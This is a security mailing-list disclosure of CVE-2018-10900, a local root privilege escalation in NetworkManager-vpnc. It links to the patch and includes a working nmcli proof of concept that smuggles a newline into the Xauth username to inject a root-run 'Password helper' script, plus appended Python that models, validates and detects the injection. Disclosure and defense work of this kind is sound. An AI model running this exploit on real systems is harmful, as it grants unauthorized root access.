oss-sec mailing list archives

CVE-2018-10900: NetworkManager-vpnc-1.2.4 local privilege escalation


From: Lubomir Rintel <lkundrak () v3 sk>
Date: Fri, 20 Jul 2018 11:38:39 +0200

Hi,

NetworkManager-vpnc-1.2.6 fixes a local authenticated root bug.

The bug was responsibly disclosed to us by Denis Andzakovic. Please
credit him if you issue an advisory for a product that ships the
affected code. His original advisory should be available soon at
https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc

CVE Number: CVE-2018-10900

Original Report (will be available soon):
https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc

Patch:
https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4

Release Notes:
https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.news

Patched Version:
https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.tar.xz

The exploit code for QA and documentation purposes follows:

cat <<EOF >/tmp/helper
#!/bin/bash
id >/tmp/pwned
EOF
chmod +x /tmp/helper
nmcli c add con-name poc type vpn ifname '*' vpn-type vpnc \
+vpn.data "IKE DH Group = dh2" \
+vpn.data "IPSec ID = bar" \
+vpn.data "IPSec gateway = 127.0.0.1" \
+vpn.data "IPSec secret-flags = 4" \
+vpn.data "Local Port = 0" \
+vpn.data "NAT Traversal Mode = natt" \
+vpn.data "Perfect Forward Secrecy = server" \
+vpn.data "Vendor = cisco" \
+vpn.data "Xauth password-flags = 4" \
+vpn.data "Xauth username = foo$(echo; echo Password helper /tmp/helper)" \
+vpn.data "ipsec-secret-type = save" \
+vpn.data "xauth-password-type = save"
nmcli c up poc

$ cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)
context=system_u:system_r:vpnc_t:s0

Take care,
Lubo
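As an added illustration, not code from this advisory or from NetworkManager-vpnc: a small Python model of how a vpn.data value carrying an embedded newline turns into an extra vpnc directive when the profile is written out as one `Key value` line per item, together with the input check a service writing such a file should apply and a scan of a rendered config for executable-running directives the profile never declared. The serializer, the function names and the `Script` directive (taken from vpnc's config format) are assumptions; the sample profile is constructed from the values in the mail above.

```python
import re

# vpnc.conf directives whose argument names an executable vpnc runs as root.
# "Password helper" appears in the advisory; "Script" is assumed from vpnc's format.
EXEC_DIRECTIVES = ("Password helper", "Script")
CONTROL_CHARS = re.compile(r"[\r\n\x00]")


def render_vpnc_config(vpn_data):
    """Model of a naive 'Key value' serializer (constructed here, not nm-vpnc's code).
    A newline inside a value ends the line early and starts a new directive."""
    return "".join(f"{key} {value}\n" for key, value in vpn_data.items())


def validate_vpn_data(vpn_data):
    """Mitigation: return the keys whose name or value carries a line break or NUL.
    A writer should refuse to emit a profile for which this list is non-empty."""
    return [k for k, v in vpn_data.items()
            if CONTROL_CHARS.search(k) or CONTROL_CHARS.search(v)]


def injected_exec_directives(config_text, declared_keys):
    """Detection: return (directive, argument) pairs for executable-running
    directives present in a rendered config that the profile never declared."""
    hits = []
    for line in config_text.splitlines():
        for directive in EXEC_DIRECTIVES:
            if line.startswith(directive + " ") and directive not in declared_keys:
                hits.append((directive, line[len(directive) + 1:].strip()))
    return hits


# Constructed sample: the advisory's profile reduced to the relevant items.
SAMPLE = {
    "IPSec gateway": "127.0.0.1",
    "IPSec ID": "bar",
    "Xauth username": "foo\nPassword helper /tmp/helper",
}

if __name__ == "__main__":
    rendered = render_vpnc_config(SAMPLE)
    print(validate_vpn_data(SAMPLE))                       # ['Xauth username']
    print(injected_exec_directives(rendered, SAMPLE))      # [('Password helper', '/tmp/helper')]
```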

